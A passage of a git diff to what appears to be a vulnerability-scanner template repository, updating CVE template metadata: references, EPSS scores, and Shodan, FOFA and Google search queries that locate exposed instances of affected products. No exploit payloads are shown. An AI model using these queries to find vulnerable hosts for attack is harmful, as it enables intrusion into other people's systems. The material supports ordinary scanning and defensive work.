cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink http: diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index aae84cd6d7..79eddea40f 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -15,13 +15,14 @@ info: - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html - https://github.com/TheHackingRabbi/CVE-2021-42663 - https://nvd.nist.gov/vuln/detail/CVE-2021-42663 + - https://github.com/SYRTI/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45174 + epss-percentile: 0.45225 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index e6eb7c04ec..8a8e11843d 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: totolink product: ex1200t_firmware - shodan-query: title:"TOTOLINK" + shodan-query: + - title:"TOTOLINK" + - http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" tags: cve2021,cve,totolink,auth-bypass,router diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 08ffcdc8de..fbba8a614d 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -27,8 +27,10 @@ info: max-request: 1 vendor: fortinet product: fortimail - fofa-query: title="fortimail" shodan-query: http.title:"fortimail" + fofa-query: + - title="fortimail" + - fortimail && port=443 google-query: intitle:"fortimail" tags: cve,cve2021,fortimail,xss,fortinet,edb diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 8df2d6d1e4..eca36652a5 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: thoughtworks product: gocd - shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - fofa-query: title="create a pipeline - go" html:"gocd version" + shodan-query: + - http.title:"Create a pipeline - Go" html:"GoCD Version" + - http.html:"gocd version" + - http.title:"create a pipeline - go" html:"gocd version" + fofa-query: + - title="create a pipeline - go" html:"gocd version" + - body="gocd version" google-query: intitle:"create a pipeline - go" html:"gocd version" tags: cve2021,cve,go,lfi,gocd,thoughtworks diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 20a7c40ec6..14cdce307c 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -29,8 +29,13 @@ info: max-request: 3 vendor: atmail product: atmail - shodan-query: http.html:"Powered by Atmail" - fofa-query: body="powered by atmail" + shodan-query: + - http.html:"Powered by Atmail" + - http.html:"powered by atmail" + - http.html:"atmail" + fofa-query: + - body="powered by atmail" + - body="atmail" tags: cve2021,cve,atmail,xss http: diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index d3b18de76c..06fa51c27f 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,unauth,spotweb_project diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index aac18356c8..6852c573f6 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -29,8 +29,12 @@ info: max-request: 2 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: body="kkfileview" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - body="kkfileview" + - app="kkfileview" tags: cve2021,cve,kkfileview,traversal,lfi,keking http: diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index a32006f43a..b975326856 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -27,8 +27,13 @@ info: max-request: 3 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,packetstorm,grafana,lfi diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 608cb87aea..ef3de506fc 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -26,7 +26,10 @@ info: max-request: 2 vendor: caucho product: resin - shodan-query: html:"Resin" + shodan-query: + - html:"Resin" + - http.html:"resin" + - cpe:"cpe:2.3:a:caucho:resin" fofa-query: body="resin" tags: cve2021,cve,resin,caucho,lfi diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index 003fad7886..bd2ddb4685 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -17,14 +17,16 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 - epss-score: 0.01355 - epss-percentile: 0.84732 + epss-score: 0.01303 + epss-percentile: 0.85873 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hashicorp product: sentinel - shodan-query: title:"Sentinel Dashboard" + shodan-query: + - title:"Sentinel Dashboard" + - http.title:"sentinel dashboard" fofa-query: title="sentinel dashboard" google-query: intitle:"sentinel dashboard" tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 8db490ca6e..0d2b00e43b 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -29,9 +29,14 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"Reprise License Manager" + shodan-query: + - http.html:"Reprise License Manager" + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" - fofa-query: body="reprise license manager" tags: cve,cve2021,packetstorm,rlm,auth-bypass,reprisesoftware http: diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 68ab110e4d..eaaaffbd1f 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -28,8 +28,12 @@ info: max-request: 3 vendor: apache product: superset - shodan-query: http.favicon.hash:1582430156 - fofa-query: body="apache superset" + shodan-query: + - http.favicon.hash:1582430156 + - http.html:"apache superset" + fofa-query: + - body="apache superset" + - icon_hash=1582430156 tags: cve2021,cve,apache,superset,default-login http: diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index de935da98c..b44a958333 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -27,7 +27,9 @@ info: vendor: zohocorp product: manageengine_desktop_central shodan-query: http.title:"manageengine desktop central 10" - fofa-query: title="manageengine desktop central 10" + fofa-query: + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" google-query: intitle:"manageengine desktop central 10" tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 8772a96bbd..2f822a2ac8 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 - https://github.com/rails/rails/commit/0fccfb9a3097a9c4260c791f1a40b128517e7815 - https://www.debian.org/security/2023/dsa-5372 + - https://security.netapp.com/advisory/ntap-20240208-0003/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-44528 cwe-id: CWE-601 - epss-score: 0.00087 - epss-percentile: 0.36061 + epss-score: 0.00178 + epss-percentile: 0.54936 cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index acf814c089..1049ac9750 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: ivanti product: endpoint_manager_cloud_services_appliance - shodan-query: title:"LANDesk(R) Cloud Services Appliance" + shodan-query: + - title:"LANDesk(R) Cloud Services Appliance" + - http.title:"landesk(r) cloud services appliance" fofa-query: title="landesk(r) cloud services appliance" google-query: intitle:"landesk(r) cloud services appliance" tags: cve2021,cve,ivanti,epm,csa,injection,packetstorm,kev diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index ac8ea39e8d..212dd1d043 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -27,9 +27,11 @@ info: max-request: 1 vendor: hd-network_real-time_monitoring_system_project product: hd-network_real-time_monitoring_system - google-query: intitle:"HD-Network Real-time Monitoring System V2.0" shodan-query: http.title:"hd-network real-time monitoring system v2.0" fofa-query: title="hd-network real-time monitoring system v2.0" + google-query: + - intitle:"HD-Network Real-time Monitoring System V2.0" + - intitle:"hd-network real-time monitoring system v2.0" tags: cve2021,cve,camera,edb,hdnetwork,lfi,iot,hd-network_real-time_monitoring_system_project http: diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 9564be3d8b..24385a6024 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: appcms product: appcms - shodan-query: http.html:"Powerd by AppCMS" + shodan-query: + - http.html:"Powerd by AppCMS" + - http.html:"powerd by appcms" fofa-query: body="powerd by appcms" tags: cve2021,cve,appcms,xss diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index cd53d1b650..35cd7a7e17 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: reprisesoftware product: reprise_license_manager - shodan-query: http.html:"Reprise License" - fofa-query: body="reprise license manager" + shodan-query: + - http.html:"Reprise License" + - http.html:"reprise license" + - http.html:"reprise license manager" + fofa-query: + - body="reprise license manager" + - body="reprise license" google-query: inurl:"/goforms/menu" tags: cve2021,cve,reprise,xss,seclists,reprisesoftware diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 2dd29fe805..5470e65105 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.8 cve-id: CVE-2021-46073 cwe-id: CWE-79 - epss-score: 0.00084 - epss-percentile: 0.34354 + epss-score: 0.0011 + epss-percentile: 0.4404 cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index da28a64a04..8efddaec54 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: ligeo-archives product: ligeo_basics - shodan-query: title:"Ligeo" - fofa-query: title="Ligeo" + shodan-query: + - title:"Ligeo" + - http.title:"ligeo" + fofa-query: + - title="Ligeo" + - title="ligeo" google-query: intitle:"ligeo" tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index f171757e1b..93fb980545 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: zyxel product: zywall_2_plus_internet_security_appliance_firmware - shodan-query: http.title:"Zywall2Plus" + shodan-query: + - http.title:"Zywall2Plus" + - http.title:"zywall2plus" fofa-query: title="zywall2plus" google-query: intitle:"zywall2plus" tags: cve2021,cve,xss,zyxel,edb diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 450af2d9b2..2258c6bda3 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: franklinfueling product: colibri_firmware - shodan-query: http.html:"Franklin Fueling Systems" + shodan-query: + - http.html:"Franklin Fueling Systems" + - http.html:"franklin fueling systems" fofa-query: body="franklin fueling systems" tags: cve2021,cve,packetstorm,franklinfueling,lfi diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 0631fadd06..4437c0a141 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -19,10 +19,10 @@ info: cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: telesquare - product: tlr-2855ks6 - fofa-query: product=="TELESQUARE-TLR-2855KS6" + product: "tlr-2855ks6" + fofa-query: "product==\"TELESQUARE-TLR-2855KS6\"" tags: packetstorm,cve,cve2021,telesquare,intrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index 7ad2c0330a..d715dc2e4c 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -19,12 +19,17 @@ info: cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: telesquare - product: tlr-2855ks6_firmware - shodan-query: title:"Login to TLR-2855KS6" - fofa-query: product=="TELESQUARE-TLR-2855KS6" - google-query: intitle:"login to tlr-2855ks6" + product: "tlr-2855ks6_firmware" + shodan-query: + - "title:\"Login to TLR-2855KS6\"" + - http.title:"login to tlr-2855ks6" + fofa-query: + - "product==\"TELESQUARE-TLR-2855KS6\"" + - title="login to tlr-2855ks6" + - product=="telesquare-tlr-2855ks6" + google-query: "intitle:\"login to tlr-2855ks6\"" tags: packetstorm,cve,cve2021,telesquare,intrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 51307d001c..2b8528f7fc 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -28,7 +28,9 @@ info: max-request: 3 vendor: telesquare product: tlr-2005ksh_firmware - shodan-query: http.html:"TLR-2005KSH" + shodan-query: + - http.html:"TLR-2005KSH" + - http.html:"tlr-2005ksh" fofa-query: body="tlr-2005ksh" tags: cve2021,cve,telesquare,intrusive,packetstorm diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index 235e91b304..a958d31aec 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: genieacs product: genieacs - shodan-query: http.favicon.hash:-2098066288 - fofa-query: body="genieacs" + shodan-query: + - http.favicon.hash:-2098066288 + - http.html:"genieacs" + fofa-query: + - body="genieacs" + - icon_hash=-2098066288 tags: cve2021,cve,genieacs,rce http: diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 92319bb8f8..84c97ebe05 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -28,9 +28,9 @@ info: vendor: 10web product: photo_gallery framework: wordpress - publicwww-query: "/wp-content/plugins/photo-gallery" shodan-query: http.html:/wp-content/plugins/photo-gallery fofa-query: body=/wp-content/plugins/photo-gallery + publicwww-query: "/wp-content/plugins/photo-gallery" tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index bd225046da..f903b4b300 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0201 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40882 + epss-percentile: 0.41295 cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 03c5cbb12f..20beb4db78 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059 - https://nvd.nist.gov/vuln/detail/CVE-2022-0220 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.00124 - epss-percentile: 0.46641 + epss-percentile: 0.4686 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 84547bef16..203bb5afb9 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -26,9 +26,9 @@ info: vendor: sygnoos product: popup_builder framework: wordpress - publicwww-query: /wp-content/plugins/popup-builder/ shodan-query: http.html:/wp-content/plugins/popup-builder/ fofa-query: body=/wp-content/plugins/popup-builder/ + publicwww-query: /wp-content/plugins/popup-builder/ tags: cve2022,cve,wordpress,wp-plugin,wp,wpscan,popup-builder,sygnoos,sqli http: diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 84e5d11348..2b78063b5d 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -29,9 +29,9 @@ info: vendor: thimpress product: learnpress framework: wordpress - publicwww-query: /wp-content/plugins/learnpress shodan-query: http.html:/wp-content/plugins/learnpress fofa-query: body=/wp-content/plugins/learnpress + publicwww-query: /wp-content/plugins/learnpress tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress http: diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index e23858ffff..9906c9614f 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -20,15 +20,19 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 - epss-score: 0.0049 - epss-percentile: 0.73618 + epss-score: 0.00415 + epss-percentile: 0.73978 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,microweber,disclosure,huntr http: diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index bb4480858b..767c564c99 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: zyxel product: usg40_firmware - fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1" + fofa-query: + - body="/2FA-access.cgi" && body="zyxel zyxel_style1" + - body="/2fa-access.cgi" && body="zyxel zyxel_style1" tags: cve2022,cve,zyxel,auth-bypass,router http: diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 69b67c8ec6..f781f8dd17 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -27,8 +27,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve2022,cve,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index 885fbbe07c..9eedff76b0 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -25,12 +25,11 @@ info: epss-percentile: 0.59134 cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: embed_swagger_project - product: embed_swagger + max-request: 2 + vendor: "embed_swagger_project" + product: "embed_swagger" framework: wordpress tags: cve,cve2022,swagger,xss,wordpress,embed_swagger_project - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index a9ba72f2d9..f76c10feff 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -28,9 +28,11 @@ info: max-request: 6 vendor: gogs product: gogs - google-query: intitle:"sign in - gogs" - shodan-query: cpe:"cpe:2.3:a:gogs:gogs" + shodan-query: + - cpe:"cpe:2.3:a:gogs:gogs" + - http.title:"sign in - gogs" fofa-query: title="sign in - gogs" + google-query: intitle:"sign in - gogs" tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive http: diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index 47f531630a..de1d4da9ce 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0424 cwe-id: CWE-306 - epss-score: 0.00082 - epss-percentile: 0.34103 + epss-score: 0.01488 + epss-percentile: 0.86805 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,10 +24,10 @@ info: vendor: supsystic product: popup framework: wordpress - publicwww-query: "/wp-content/plugins/popup-by-supsystic" shodan-query: http.html:/wp-content/plugins/popup-by-supsystic fofa-query: body=/wp-content/plugins/popup-by-supsystic - tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup + publicwww-query: "/wp-content/plugins/popup-by-supsystic" + tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup,supsystic http: - raw: diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 91c83ccdaa..dc0db1b43f 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -26,9 +26,9 @@ info: vendor: metaphorcreations product: ditty framework: wordpress - publicwww-query: "/wp-content/plugins/ditty-news-ticker/" shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ fofa-query: body=/wp-content/plugins/ditty-news-ticker/ + publicwww-query: "/wp-content/plugins/ditty-news-ticker/" tags: cve,cve2022,xss,ditty-news-ticker,wp,wordpress,wpscan,wp-plugin,authenticated,metaphorcreations http: diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 477db3d259..1c430c29ef 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -24,10 +24,12 @@ info: epss-percentile: 0.96565 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: atlassian - product: jira_data_center - shodan-query: http.component:"Atlassian Jira" + product: "jira_data_center" + shodan-query: + - "http.component:\"Atlassian Jira\"" + - http.component:"atlassian jira" tags: cve,cve2022,atlassian,jira,exposure,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index fbc9d485a3..a511b1731c 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -23,13 +23,12 @@ info: cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: subtlewebinc product: formcraft3 framework: wordpress - fofa-query: body="formcraft3" && body="wp-" + fofa-query: "body=\"formcraft3\" && body=\"wp-\"" tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 263abc5ea6..f9709be40d 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -24,8 +24,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,microweber,redirect,oss http: diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 62b50a0d98..ad9616a750 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -27,10 +27,10 @@ info: vendor: veronalabs product: wp_statistics framework: wordpress - google-query: inurl:/wp-content/plugins/wp-statistics - publicwww-query: /wp-content/plugins/wp-statistics/ shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ + publicwww-query: /wp-content/plugins/wp-statistics/ + google-query: inurl:/wp-content/plugins/wp-statistics tags: cve,cve2022,sqli,wp,wordpress,wp-plugin,wp-statistics,veronalabs http: diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 7225f2dcfa..8c4bab886d 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -21,16 +21,20 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0660 cwe-id: CWE-209 - epss-score: 0.00719 - epss-percentile: 0.78502 + epss-score: 0.00585 + epss-percentile: 0.78101 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,microweber,disclosure,authenticated,huntr http: diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml index 251c13f693..01e3b6c259 100644 --- a/http/cves/2022/CVE-2022-0666.yaml +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -21,8 +21,13 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - tags: cve,cve2023,huntr,crlf,microweber + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - icon_hash=780351152 + - body="microweber" + tags: cve,huntr,crlf,microweber,cve2022 http: - method: GET diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index d478f5973e..2a6b1ee31c 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -29,8 +29,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 2324bd77ac..151a157ceb 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ 